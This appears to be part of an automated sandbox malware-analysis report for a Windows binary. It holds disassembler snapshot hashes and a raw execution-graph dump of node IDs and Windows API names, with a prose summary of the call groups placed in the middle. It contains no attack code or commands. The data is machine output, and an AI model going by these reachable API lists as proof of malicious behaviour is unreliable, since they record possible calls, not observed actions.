                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                              • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                              • API String ID: 1091760877-2248577382
                                                                                              • Opcode ID: 0337fad1398f74623ca9d629e94cadcd5f790e3fac987618448fd97e4c3dbe5e
                                                                                              • Instruction ID: 7201fb16c89aa26c50895b8b65304ff73c0ded47574fde19ea06a61e4c9face6
                                                                                              • Opcode Fuzzy Hash: 0337fad1398f74623ca9d629e94cadcd5f790e3fac987618448fd97e4c3dbe5e
                                                                                              • Instruction Fuzzy Hash: 16D02B3280C53033C500233C7C09D6F38147F21331FB00714F239551E0CA740A9242A1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,00A2ED75,?), ref: 00A2F5C3
                                                                                              • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00A2ED75,?), ref: 00A2F5D1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: FindHandleModuleResource
                                                                                              • String ID: RTL
                                                                                              • API String ID: 3537982541-834975271
                                                                                              • Opcode ID: 09517c7fe6494cedeb00080cf8b6984228493fd93a92005952621fcdf4c87859
                                                                                              • Instruction ID: c4cd337b8a7babc3b28e846e2907bb5062e834cf8f1c1def6d677c13c37278d2
                                                                                              • Opcode Fuzzy Hash: 09517c7fe6494cedeb00080cf8b6984228493fd93a92005952621fcdf4c87859
                                                                                              • Instruction Fuzzy Hash: C7C0123124535076E63067B57C0DB832EA87B0475AF150468B601DA5C0DAE9C8C58660
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Execution Graph

                                                                                              Execution Coverage:10.6%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:0%
                                                                                              Total number of Nodes:1680
                                                                                              Total number of Limit Nodes:52
                                                                                              execution_graph 26174 330733 20 API calls 26098 312430 26 API calls std::bad_exception::bad_exception 23947 32f431 23949 32f335 23947->23949 23950 32f9e9 23949->23950 23976 32f747 23950->23976 23952 32f9f9 23953 32fa56 23952->23953 23965 32fa7a 23952->23965 23954 32f987 DloadReleaseSectionWriteAccess 6 API calls 23953->23954 23955 32fa61 RaiseException 23954->23955 23956 32fc4f 23955->23956 23956->23949 23957 32faf2 LoadLibraryExA 23958 32fb53 23957->23958 23959 32fb05 GetLastError 23957->23959 23960 32fb5e FreeLibrary 23958->23960 23964 32fb65 23958->23964 23961 32fb18 23959->23961 23962 32fb2e 23959->23962 23960->23964 23961->23958 23961->23962 23966 32f987 DloadReleaseSectionWriteAccess 6 API calls 23962->23966 23963 32fbc3 GetProcAddress 23967 32fbd3 GetLastError 23963->23967 23970 32fc21 23963->23970 23964->23963 23964->23970 23965->23957 23965->23958 23965->23964 23965->23970 23968 32fb39 RaiseException 23966->23968 23974 32fbe6 23967->23974 23968->23956 23985 32f987 23970->23985 23971 32f987 DloadReleaseSectionWriteAccess 6 API calls 23972 32fc07 RaiseException 23971->23972 23973 32f747 ___delayLoadHelper2@8 6 API calls 23972->23973 23975 32fc1e 23973->23975 23974->23970 23974->23971 23975->23970 23977 32f753 23976->23977 23978 32f779 23976->23978 23993 32f7f0 23977->23993 23978->23952 23980 32f758 23982 32f774 23980->23982 23996 32f919 23980->23996 24001 32f77a GetModuleHandleW GetProcAddress GetProcAddress 23982->24001 23984 32f9c2 23984->23952 23986 32f9bb 23985->23986 23987 32f999 23985->23987 23986->23956 23988 32f7f0 DloadReleaseSectionWriteAccess 3 API calls 23987->23988 23989 32f99e 23988->23989 23990 32f9b6 23989->23990 23991 32f919 DloadProtectSection 3 API calls 23989->23991 24004 32f9bd GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 23990->24004 23991->23990 24002 32f77a GetModuleHandleW GetProcAddress GetProcAddress 
23993->24002 23995 32f7f5 23995->23980 23997 32f92e DloadProtectSection 23996->23997 23998 32f969 VirtualProtect 23997->23998 23999 32f934 23997->23999 24003 32f82f VirtualQuery GetSystemInfo 23997->24003 23998->23999 23999->23982 24001->23984 24002->23995 24003->23998 24004->23986 26175 339330 52 API calls 3 library calls 24062 320534 24063 320544 24062->24063 24064 32053c FreeLibrary 24062->24064 24064->24063 26099 312037 143 API calls __EH_prolog 24067 31213d 24068 312150 24067->24068 24069 312148 24067->24069 24071 31214e 24068->24071 24073 32febe 24068->24073 24086 312162 27 API calls Concurrency::cancel_current_task 24069->24086 24074 32fec3 ___std_exception_copy 24073->24074 24075 32fedd 24074->24075 24077 32fedf 24074->24077 24089 338e5c 7 API calls 2 library calls 24074->24089 24075->24071 24078 3148f5 Concurrency::cancel_current_task 24077->24078 24080 32fee9 24077->24080 24087 333340 RaiseException 24078->24087 24090 333340 RaiseException 24080->24090 24081 314911 24083 314927 24081->24083 24088 31136b 26 API calls Concurrency::cancel_current_task 24081->24088 24083->24071 24084 330820 24086->24071 24087->24081 24088->24083 24089->24074 24090->24084 24093 32f73d 24095 32f704 24093->24095 24094 32f9e9 ___delayLoadHelper2@8 14 API calls 24094->24095 24095->24093 24095->24094 26129 316920 41 API calls __EH_prolog 26100 32d420 91 API calls _swprintf 24098 33a620 24106 33bf6f 24098->24106 24102 33a63c 24103 33a649 24102->24103 24114 33a650 11 API calls 24102->24114 24105 33a634 24107 33be58 __dosmaperr 5 API calls 24106->24107 24108 33bf96 24107->24108 24109 33bfae TlsAlloc 24108->24109 24111 33bf9f 24108->24111 24109->24111 24110 330d7c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24112 33a62a 24110->24112 24111->24110 24112->24105 24113 33a599 20 API calls 2 library calls 24112->24113 24113->24102 24114->24105 26101 311025 29 API calls 24120 32f32b 14 API calls ___delayLoadHelper2@8 26159 33962a 55 API calls _free 26102 32742e 138 API 
Execution Graph (function call graph): this section of the report is an interactive call graph that was exported as raw node and edge data (numeric node IDs, function addresses in the 0x31xxxx to 0x34xxxx range, and edge pairs such as 24122->24123) and is not readable in that form. Only the API names attached to graph nodes are recoverable; they are grouped below by the call sequences the edges record. Node labels name reachable API calls, not behaviour observed at runtime, so they should be read together with the report's behaviour sections rather than on their own.

Command line and file mapping: GetCommandLineW; OpenFileMappingW -> MapViewOfFile -> UnmapViewOfFile -> CloseHandle; CreateFileMappingW -> GetCommandLineW -> MapViewOfFile -> ShellExecuteExW; GetModuleFileNameW, SetEnvironmentVariableW, GetLocalTime.
Process launch and wait: ShellExecuteExW -> WaitForInputIdle -> Sleep; ShellExecuteExW -> IsWindowVisible / ShowWindow -> WaitForInputIdle -> GetExitCodeProcess -> CloseHandle; WaitForSingleObject inside a PeekMessageW / GetMessageW / TranslateMessage / DispatchMessageW loop; AllocConsole, GetCurrentProcessId -> AttachConsole, GetStdHandle -> WriteConsoleW -> Sleep -> FreeConsole, ExitProcess.
File system: GetModuleFileNameW -> CreateFileW -> SetFilePointer -> ReadFile -> CloseHandle; SetFileAttributesW -> GetFileAttributesW -> DeleteFileW; MoveFileW -> MoveFileExW; SHFileOperationW; CreateFileW, SetFileTime, WriteFile, FindClose, GetCurrentDirectoryW, SetCurrentDirectoryW, GetSystemDirectoryW, GetFullPathNameW, ExpandEnvironmentStringsW; GetCurrentProcess -> OpenProcessToken -> SetEntriesInAclW -> InitializeSecurityDescriptor -> SetSecurityDescriptorDacl -> CreateDirectoryW -> LocalFree.
Library loading and environment probes: GetModuleHandleW, GetModuleHandleExW, LoadLibraryW, LoadLibraryExW, GetProcAddress, FreeLibrary; GetVersionExW, GetProcessAffinityMask, IsProcessorFeaturePresent, GetTickCount, QueryPerformanceFrequency, QueryPerformanceCounter, GetSystemTimeAsFileTime.
Embedded resources and GDI+: FindResourceW -> SizeofResource -> LoadResource -> LockResource -> GlobalAlloc -> GlobalLock -> GdipAlloc -> GdipCreateBitmapFromStream / GdipCreateBitmapFromStreamICM -> GdipCreateHBITMAPFromBitmap -> GlobalUnlock -> GlobalFree; GdiplusStartup, GdiplusShutdown, GdipCloneImage, GdipDisposeImage, GdipFree; OleInitialize, OleUninitialize, SHGetMalloc; LoadBitmapW, LoadIconW, LoadStringW, GetObjectW, GetDC, GetDeviceCaps, ReleaseDC, DeleteObject.
Dialog UI: DialogBoxParamW, EndDialog, GetDlgItem, GetDlgItemTextW, SetDlgItemTextW, SendMessageW, SendDlgItemMessageW, SetWindowTextW, GetClassNameW, SetFocus, EnableWindow, ShowWindow, GetWindowLongW, SetWindowLongW, IsDialogMessageW, GetClientRect, KiUserCallbackDispatcher.
Termination and CRT internals: GetPEB -> GetCurrentProcess -> TerminateProcess -> ExitProcess on the _abort path; SetUnhandledExceptionFilter -> UnhandledExceptionFilter -> GetCurrentProcess -> TerminateProcess; RaiseException; GetLastError, SetLastError; RtlAllocateHeap, RtlFreeHeap, HeapReAlloc, GetProcessHeap, TlsAlloc; InitializeCriticalSectionAndSpinCount, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection; MultiByteToWideChar, WideCharToMultiByte, LCMapStringW, GetStringTypeW, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, IsDBCSLeadByte, CompareStringW, GetCurrentThreadId, GetCommandLineA.
25326->25328 25327->25325 25327->25328 25442 31b542 25327->25442 25328->25195 25328->25196 25330->25207 25332 31a8d8 25331->25332 25333 31a935 CreateFileW 25332->25333 25334 31a929 25332->25334 25333->25334 25335 31a97f 25334->25335 25336 31cf32 GetCurrentDirectoryW 25334->25336 25335->25255 25337 31a964 25336->25337 25337->25335 25338 31a968 CreateFileW 25337->25338 25338->25335 25339->25237 25340->25248 25341->25263 25343 32d88e __EH_prolog 25342->25343 25348 32cfcb 25343->25348 25463 32c504 ExpandEnvironmentStringsW 25343->25463 25347 32dbac SetWindowTextW 25353 32d8c5 _wcslen _wcsrchr 25347->25353 25348->25275 25351 33521e 22 API calls 25351->25353 25353->25347 25353->25348 25353->25351 25354 32d99a SetFileAttributesW 25353->25354 25366 32d9b4 __cftof _wcslen 25353->25366 25464 323316 CompareStringW 25353->25464 25465 32b65d GetCurrentDirectoryW 25353->25465 25467 31b9ca 6 API calls 25353->25467 25468 31b953 FindClose 25353->25468 25469 32c67e 76 API calls 2 library calls 25353->25469 25470 32c504 ExpandEnvironmentStringsW 25353->25470 25356 32da54 GetFileAttributesW 25354->25356 25354->25366 25356->25353 25358 32da66 DeleteFileW 25356->25358 25358->25353 25360 32da77 25358->25360 25359 32dd76 GetDlgItem SetWindowTextW SendMessageW 25359->25366 25361 314a20 _swprintf 51 API calls 25360->25361 25362 32da97 GetFileAttributesW 25361->25362 25362->25360 25364 32daac MoveFileW 25362->25364 25363 32ddb6 SendMessageW 25363->25353 25364->25353 25365 32dac4 MoveFileExW 25364->25365 25365->25353 25366->25353 25366->25359 25366->25363 25367 32da30 SHFileOperationW 25366->25367 25466 31cdc0 51 API calls 2 library calls 25366->25466 25367->25356 25369 32ebac __EH_prolog 25368->25369 25471 321983 25369->25471 25371 32ebdd 25475 3164ed 25371->25475 25373 32ebfb 25479 318823 25373->25479 25377 32ec4e 25497 31890a 25377->25497 25379 32cfea 25379->25288 25381 32e7f8 25380->25381 25382 32b5d6 4 API calls 25381->25382 25383 32e7fd 25382->25383 25384 32d111 25383->25384 25385 
32e805 GetWindow 25383->25385 25384->25133 25384->25134 25385->25384 25388 32e825 25385->25388 25386 32e832 GetClassNameW 25995 323316 CompareStringW 25386->25995 25388->25384 25388->25386 25389 32e856 GetWindowLongW 25388->25389 25390 32e8ba GetWindow 25388->25390 25389->25390 25391 32e866 SendMessageW 25389->25391 25390->25384 25390->25388 25391->25390 25392 32e87c GetObjectW 25391->25392 25996 32b615 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25392->25996 25394 32e893 25997 32b5f4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25394->25997 25998 32b81c 8 API calls 25394->25998 25397 32e8a4 SendMessageW DeleteObject 25397->25390 25398->25148 25400 32bbe1 25399->25400 25401 32bc06 25399->25401 25999 323316 CompareStringW 25400->25999 25403 32bc14 25401->25403 25404 32bc0b SHAutoComplete 25401->25404 25407 32c217 25403->25407 25404->25403 25405 32bbf4 25405->25401 25406 32bbf8 FindWindowExW 25405->25406 25406->25401 25408 32c221 __EH_prolog 25407->25408 25409 3113f8 43 API calls 25408->25409 25410 32c243 25409->25410 26000 312083 25410->26000 25413 32c26c 25416 311a7e 143 API calls 25413->25416 25414 32c25d 25415 311641 86 API calls 25414->25415 25418 32c268 25415->25418 25419 32c28b __InternalCxxFrameHandler ___std_exception_copy 25416->25419 25417 311641 86 API calls 25417->25418 25418->25175 25418->25178 25419->25417 25420->25157 25422 3205f3 25421->25422 25424 320610 25421->25424 25423 320665 82 API calls 25422->25423 25423->25424 25424->25245 25425->25268 25426->25273 25427->25280 25428->25292 25429->25219 25430->25240 25431->25209 25432->25198 25433->25300 25434->25298 25436 32c344 GetTokenInformation 25435->25436 25440 32c39b 25435->25440 25437 32c369 ___std_exception_copy 25436->25437 25438 32c35e GetLastError 25436->25438 25439 32c372 GetTokenInformation 25437->25439 25438->25437 25438->25440 25439->25440 25441 32c38c CopySid 25439->25441 25440->25316 25441->25440 25443 31b54f 25442->25443 25444 31b573 25443->25444 25445 31b566 CreateDirectoryW 25443->25445 
25446 31b4c1 3 API calls 25444->25446 25445->25444 25449 31b5a6 25445->25449 25447 31b579 25446->25447 25448 31b5b9 GetLastError 25447->25448 25452 31cf32 GetCurrentDirectoryW 25447->25452 25451 31b5b5 25448->25451 25449->25451 25455 31b8e6 25449->25455 25451->25327 25453 31b58f 25452->25453 25453->25448 25454 31b593 CreateDirectoryW 25453->25454 25454->25448 25454->25449 25456 32ffd0 25455->25456 25457 31b8f3 SetFileAttributesW 25456->25457 25458 31b936 25457->25458 25459 31b909 25457->25459 25458->25451 25460 31cf32 GetCurrentDirectoryW 25459->25460 25461 31b91d 25460->25461 25461->25458 25462 31b921 SetFileAttributesW 25461->25462 25462->25458 25463->25353 25464->25353 25465->25353 25466->25366 25467->25353 25468->25353 25469->25353 25470->25353 25472 321990 _wcslen 25471->25472 25506 311895 25472->25506 25474 3219a8 25474->25371 25476 321983 _wcslen 25475->25476 25477 311895 78 API calls 25476->25477 25478 3219a8 25477->25478 25478->25373 25480 31882d __EH_prolog 25479->25480 25519 31e298 25480->25519 25482 318855 25483 32febe 27 API calls 25482->25483 25484 318899 __cftof 25483->25484 25485 32febe 27 API calls 25484->25485 25486 3188c0 25485->25486 25525 325c64 25486->25525 25489 318a38 25490 318a42 25489->25490 25493 318ab5 25490->25493 25554 31b966 25490->25554 25492 318b5c 25492->25377 25494 318b1a 25493->25494 25532 3190a2 25493->25532 25494->25492 25560 311397 74 API calls 25494->25560 25991 31a41a 25497->25991 25499 31892b 25500 31893c Concurrency::cancel_current_task 25499->25500 25501 323546 86 API calls 25499->25501 25502 312111 26 API calls 25500->25502 25501->25500 25503 318963 25502->25503 25504 31e339 86 API calls 25503->25504 25505 31896b 25504->25505 25505->25379 25508 3118a7 25506->25508 25513 3118ff 25506->25513 25507 3118d0 25509 33521e 22 API calls 25507->25509 25508->25507 25516 3176e9 76 API calls __vswprintf_c_l 25508->25516 25511 3118f0 25509->25511 25511->25513 25518 31775a 75 API calls 25511->25518 25512 3118c6 25517 31775a 75 API 
calls 25512->25517 25513->25474 25516->25512 25517->25507 25518->25513 25520 31e2a2 __EH_prolog 25519->25520 25521 32febe 27 API calls 25520->25521 25523 31e2e5 25521->25523 25522 32febe 27 API calls 25524 31e309 25522->25524 25523->25522 25524->25482 25526 325c6e __EH_prolog 25525->25526 25527 32febe 27 API calls 25526->25527 25528 325c8a 25527->25528 25529 3188f2 25528->25529 25531 322166 80 API calls 25528->25531 25529->25489 25531->25529 25533 3190ac __EH_prolog 25532->25533 25561 3113f8 25533->25561 25535 3190c8 25536 3190d9 25535->25536 25723 31b1d2 25535->25723 25540 319110 25536->25540 25571 311ad3 25536->25571 25539 31910c 25539->25540 25590 312032 25539->25590 25715 311641 25540->25715 25544 3191b2 25594 31924e 25544->25594 25547 319211 25547->25540 25602 314264 25547->25602 25614 3192c6 25547->25614 25552 31b966 7 API calls 25553 319139 25552->25553 25553->25544 25553->25552 25727 31d4d2 CompareStringW _wcslen 25553->25727 25555 31b97b 25554->25555 25559 31b9a9 25555->25559 25980 31ba94 25555->25980 25557 31b98b 25558 31b990 FindClose 25557->25558 25557->25559 25558->25559 25559->25490 25560->25492 25562 3113fd __EH_prolog 25561->25562 25563 31e298 27 API calls 25562->25563 25564 311437 25563->25564 25565 32febe 27 API calls 25564->25565 25568 3114ab 25564->25568 25566 311498 25565->25566 25566->25568 25569 31644d 43 API calls 25566->25569 25728 31c1f7 25568->25728 25569->25568 25570 311533 __cftof 25570->25535 25572 311add __EH_prolog 25571->25572 25584 311b30 25572->25584 25587 311c63 25572->25587 25746 3113d9 25572->25746 25574 311c9e 25749 311397 74 API calls 25574->25749 25577 314264 116 API calls 25581 311ce9 25577->25581 25578 311cab 25578->25577 25578->25587 25579 311d31 25582 311d64 25579->25582 25579->25587 25750 311397 74 API calls 25579->25750 25581->25579 25583 314264 116 API calls 25581->25583 25582->25587 25589 31b110 79 API calls 25582->25589 25583->25581 25584->25574 25584->25578 25584->25587 25585 314264 116 API calls 25586 311db5 
25585->25586 25586->25585 25586->25587 25587->25539 25588 31b110 79 API calls 25588->25584 25589->25586 25592 312037 __EH_prolog 25590->25592 25591 312068 25591->25553 25592->25591 25764 311a7e 25592->25764 25887 31e395 25594->25887 25596 31925e 25891 322701 GetSystemTime SystemTimeToFileTime 25596->25891 25598 3191cc 25598->25547 25599 322eb4 25598->25599 25896 32efab 25599->25896 25603 314270 25602->25603 25604 314274 25602->25604 25603->25547 25613 31b110 79 API calls 25604->25613 25605 314286 25606 3142a1 25605->25606 25607 3142af 25605->25607 25608 3142e1 25606->25608 25904 31395a 104 API calls 3 library calls 25606->25904 25905 312eb6 116 API calls 3 library calls 25607->25905 25608->25547 25611 3142ad 25611->25608 25906 312544 74 API calls 25611->25906 25613->25605 25615 3192d0 __EH_prolog 25614->25615 25619 31930e 25615->25619 25642 31973d Concurrency::cancel_current_task 25615->25642 25925 329cad 118 API calls 25615->25925 25616 31a18d 25618 31a1c5 25616->25618 25620 31a192 25616->25620 25618->25642 25956 329cad 118 API calls 25618->25956 25619->25616 25622 31932f 25619->25622 25619->25642 25620->25642 25955 318675 168 API calls 25620->25955 25622->25642 25907 3166df 25622->25907 25625 319545 25630 319669 25625->25630 25625->25642 25928 318f6b 38 API calls 25625->25928 25627 319405 25627->25625 25926 31b5d6 57 API calls 3 library calls 25627->25926 25633 31b966 7 API calls 25630->25633 25636 3196db 25630->25636 25632 3195ac 25927 338a18 26 API calls ___std_exception_copy 25632->25927 25633->25636 25635 319935 25935 31e4a9 96 API calls 25635->25935 25913 3189c8 25636->25913 25639 31976c 25663 3197c5 25639->25663 25929 314727 27 API calls 2 library calls 25639->25929 25642->25547 25643 319990 25644 319a3a 25643->25644 25649 3199bb 25643->25649 25648 319a8c 25644->25648 25661 319a45 25644->25661 25645 3198f4 Concurrency::cancel_current_task 25645->25643 25936 31851f 50 API calls 2 library calls 25645->25936 25656 319a2c 25648->25656 25939 318db3 119 API calls 
25648->25939 25653 31b4c1 3 API calls 25649->25653 25649->25656 25658 319ae8 25649->25658 25650 31a14a 25654 31a801 80 API calls 25650->25654 25651 319a8a 25652 31a801 80 API calls 25651->25652 25652->25642 25657 3199f3 25653->25657 25654->25642 25656->25651 25656->25658 25657->25656 25937 31a50a 97 API calls 25657->25937 25658->25650 25674 319b53 25658->25674 25940 31ab1c 25658->25940 25659 31bf0a 27 API calls 25662 319ba2 25659->25662 25661->25651 25938 318b7c 123 API calls 25661->25938 25667 31bf0a 27 API calls 25662->25667 25663->25642 25663->25645 25664 3198ed 25663->25664 25930 3187fb 41 API calls 25663->25930 25931 31e4a9 96 API calls 25663->25931 25932 31237a 74 API calls 25663->25932 25933 318f28 99 API calls 25663->25933 25934 31237a 74 API calls 25664->25934 25685 319bb8 25667->25685 25672 319b41 25944 317951 77 API calls 25672->25944 25674->25659 25675 319c8b 25676 319e85 25675->25676 25677 319ce7 25675->25677 25678 319e97 25676->25678 25679 319eab 25676->25679 25699 319d20 25676->25699 25680 319cff 25677->25680 25684 319da7 25677->25684 25681 31a475 138 API calls 25678->25681 25683 324586 75 API calls 25679->25683 25682 319d46 25680->25682 25689 319d0e 25680->25689 25681->25699 25682->25699 25947 31829b 112 API calls 25682->25947 25687 319ec4 25683->25687 25948 318f6b 38 API calls 25684->25948 25685->25675 25686 319c62 25685->25686 25694 31aa7a 79 API calls 25685->25694 25686->25675 25945 31ac9c 82 API calls 25686->25945 25951 32422f 138 API calls 25687->25951 25946 31237a 74 API calls 25689->25946 25692 319e76 25692->25547 25694->25686 25696 319dec 25697 319e08 25696->25697 25698 319e1f 25696->25698 25696->25699 25949 318037 85 API calls 25697->25949 25950 31a212 103 API calls __EH_prolog 25698->25950 25699->25692 25703 319fca 25699->25703 25952 31237a 74 API calls 25699->25952 25703->25650 25705 31a083 25703->25705 25713 31a0d5 25703->25713 25919 31b199 SetEndOfFile 25703->25919 25704 31b8e6 3 API calls 25708 31a130 25704->25708 25920 31b032 
25705->25920 25708->25650 25953 31237a 74 API calls 25708->25953 25709 31a0ca 25710 31a880 77 API calls 25709->25710 25710->25713 25712 31a140 25954 317871 76 API calls 25712->25954 25713->25650 25713->25704 25716 311665 Concurrency::cancel_current_task 25715->25716 25717 311653 25715->25717 25719 312111 26 API calls 25716->25719 25717->25716 25970 3116b2 26 API calls 25717->25970 25720 311694 25719->25720 25971 31e339 25720->25971 25725 31b1e9 25723->25725 25724 31b1f3 25724->25536 25725->25724 25979 3177af 78 API calls 25725->25979 25727->25553 25729 31c20d __cftof 25728->25729 25734 31c0d3 25729->25734 25741 31c0b4 25734->25741 25736 31c148 25737 312111 25736->25737 25738 31212b 25737->25738 25739 31211c 25737->25739 25738->25570 25745 31136b 26 API calls Concurrency::cancel_current_task 25739->25745 25742 31c0c2 25741->25742 25743 31c0bd 25741->25743 25742->25736 25744 312111 26 API calls 25743->25744 25744->25742 25745->25738 25751 311822 25746->25751 25749->25587 25750->25582 25752 311834 25751->25752 25758 3113f2 25751->25758 25753 31185d 25752->25753 25761 3176e9 76 API calls __vswprintf_c_l 25752->25761 25754 33521e 22 API calls 25753->25754 25756 31187a 25754->25756 25756->25758 25763 31775a 75 API calls 25756->25763 25757 311853 25762 31775a 75 API calls 25757->25762 25758->25588 25761->25757 25762->25753 25763->25758 25765 311a8a 25764->25765 25766 311a8e 25764->25766 25765->25591 25768 3119c5 25766->25768 25769 3119d7 25768->25769 25770 311a14 25768->25770 25771 314264 116 API calls 25769->25771 25776 3146ce 25770->25776 25774 3119f7 25771->25774 25774->25765 25780 3146d7 25776->25780 25777 314264 116 API calls 25777->25780 25778 311a35 25778->25774 25781 311f30 25778->25781 25780->25777 25780->25778 25793 322128 25780->25793 25782 311f3a __EH_prolog 25781->25782 25801 3142f1 25782->25801 25784 311f61 25785 311fe8 25784->25785 25786 311822 78 API calls 25784->25786 25785->25774 25787 311f78 25786->25787 25829 31190b 78 API calls 25787->25829 25789 
311f90 25791 311f9c _wcslen 25789->25791 25830 322ed2 MultiByteToWideChar 25789->25830 25831 31190b 78 API calls 25791->25831 25794 32212f 25793->25794 25795 32214a 25794->25795 25799 3176e4 RaiseException std::_Xinvalid_argument 25794->25799 25796 32215b SetThreadExecutionState 25795->25796 25800 3176e4 RaiseException std::_Xinvalid_argument 25795->25800 25796->25780 25799->25795 25800->25796 25802 3142fb __EH_prolog 25801->25802 25803 314311 25802->25803 25804 31432d 25802->25804 25857 311397 74 API calls 25803->25857 25806 314588 25804->25806 25809 314359 25804->25809 25869 311397 74 API calls 25806->25869 25808 31431c 25808->25784 25809->25808 25832 324586 25809->25832 25811 3143da 25813 314465 25811->25813 25828 3143d1 25811->25828 25860 31e4a9 96 API calls 25811->25860 25812 3143d6 25812->25811 25859 31252a 78 API calls 25812->25859 25842 31bf0a 25813->25842 25815 3143c6 25858 311397 74 API calls 25815->25858 25816 3143a8 25816->25811 25816->25812 25816->25815 25818 314478 25822 31450e 25818->25822 25823 3144fe 25818->25823 25861 32422f 138 API calls 25822->25861 25846 31a475 25823->25846 25826 31450c 25826->25828 25862 31237a 74 API calls 25826->25862 25863 323546 25828->25863 25829->25789 25830->25791 25831->25785 25833 32459b 25832->25833 25835 3245a5 ___std_exception_copy 25832->25835 25870 31775a 75 API calls 25833->25870 25836 32462b 25835->25836 25837 3246d5 25835->25837 25841 32464f __cftof 25835->25841 25871 3244b9 75 API calls 3 library calls 25836->25871 25872 333340 RaiseException 25837->25872 25840 324701 25841->25816 25843 31bf18 25842->25843 25845 31bf22 25842->25845 25844 32febe 27 API calls 25843->25844 25844->25845 25845->25818 25847 31a47f __EH_prolog 25846->25847 25873 318a1f 25847->25873 25850 3113d9 78 API calls 25851 31a492 25850->25851 25876 31e56c 25851->25876 25853 31a4ee 25853->25826 25855 31e56c 133 API calls 25856 31a4a5 25855->25856 25856->25853 25856->25855 25885 31e758 97 API calls __InternalCxxFrameHandler 25856->25885 
25857->25808 25858->25828 25859->25811 25860->25813 25861->25826 25862->25828 25864 323550 25863->25864 25865 323569 25864->25865 25868 32357d 25864->25868 25886 32220d 86 API calls 25865->25886 25867 323570 Concurrency::cancel_current_task 25867->25868 25869->25808 25870->25835 25871->25841 25872->25840 25874 31c619 GetVersionExW 25873->25874 25875 318a24 25874->25875 25875->25850 25883 31e582 __InternalCxxFrameHandler 25876->25883 25877 31e6f2 25878 31e726 25877->25878 25879 31e523 6 API calls 25877->25879 25880 322128 SetThreadExecutionState RaiseException 25878->25880 25879->25878 25882 31e6e9 25880->25882 25881 329cad 118 API calls 25881->25883 25882->25856 25883->25877 25883->25881 25883->25882 25884 31bff5 91 API calls 25883->25884 25884->25883 25885->25856 25886->25867 25888 31e3a5 25887->25888 25890 31e3ac 25887->25890 25892 31aa7a 25888->25892 25890->25596 25891->25598 25893 31aa93 25892->25893 25895 31b110 79 API calls 25893->25895 25894 31aac5 25894->25890 25895->25894 25897 32efb8 25896->25897 25898 31f937 53 API calls 25897->25898 25899 32efdb 25898->25899 25900 314a20 _swprintf 51 API calls 25899->25900 25901 32efed 25900->25901 25902 32e619 16 API calls 25901->25902 25903 322eca 25902->25903 25903->25547 25904->25611 25905->25611 25906->25608 25908 3166ef 25907->25908 25957 3165fb 25908->25957 25910 316722 25912 31675a 25910->25912 25962 31c6af CharUpperW CompareStringW _wcslen ___vcrt_InitializeCriticalSectionEx 25910->25962 25912->25627 25914 3189dd 25913->25914 25915 318a15 25914->25915 25968 317931 74 API calls 25914->25968 25915->25635 25915->25639 25915->25642 25917 318a0d 25969 311397 74 API calls 25917->25969 25919->25705 25921 31b043 25920->25921 25923 31b052 25920->25923 25922 31b049 FlushFileBuffers 25921->25922 25921->25923 25922->25923 25924 31b0cf SetFileTime 25923->25924 25924->25709 25925->25619 25926->25632 25927->25625 25928->25630 25929->25663 25930->25663 25931->25663 25932->25663 25933->25663 25934->25645 25935->25645 
25936->25643 25937->25656 25938->25651 25939->25656 25941 319b2b 25940->25941 25942 31ab25 GetFileType 25940->25942 25941->25674 25943 31237a 74 API calls 25941->25943 25942->25941 25943->25672 25944->25674 25945->25675 25946->25699 25947->25699 25948->25696 25949->25699 25950->25699 25951->25699 25952->25703 25953->25712 25954->25650 25955->25642 25956->25642 25963 3164f8 25957->25963 25959 31661c 25959->25910 25961 3164f8 2 API calls 25961->25959 25962->25910 25966 316502 25963->25966 25964 3165ea 25964->25959 25964->25961 25966->25964 25967 31c6af CharUpperW CompareStringW _wcslen ___vcrt_InitializeCriticalSectionEx 25966->25967 25967->25966 25968->25917 25969->25915 25972 31e34a Concurrency::cancel_current_task 25971->25972 25977 31bd8e 86 API calls Concurrency::cancel_current_task 25972->25977 25974 31e37c 25978 31bd8e 86 API calls Concurrency::cancel_current_task 25974->25978 25976 31e387 25977->25974 25978->25976 25979->25724 25981 31baa1 25980->25981 25982 31bb20 FindNextFileW 25981->25982 25983 31baba FindFirstFileW 25981->25983 25985 31bb02 25982->25985 25986 31bb2b GetLastError 25982->25986 25984 31bac9 25983->25984 25983->25985 25987 31cf32 GetCurrentDirectoryW 25984->25987 25985->25557 25986->25985 25988 31bad9 25987->25988 25989 31baf7 GetLastError 25988->25989 25990 31badd FindFirstFileW 25988->25990 25989->25985 25990->25985 25990->25989 25992 31a458 __cftof 25991->25992 25994 31a425 25991->25994 25992->25499 25993 31b470 3 API calls 25993->25994 25994->25992 25994->25993 25995->25388 25996->25394 25997->25394 25998->25397 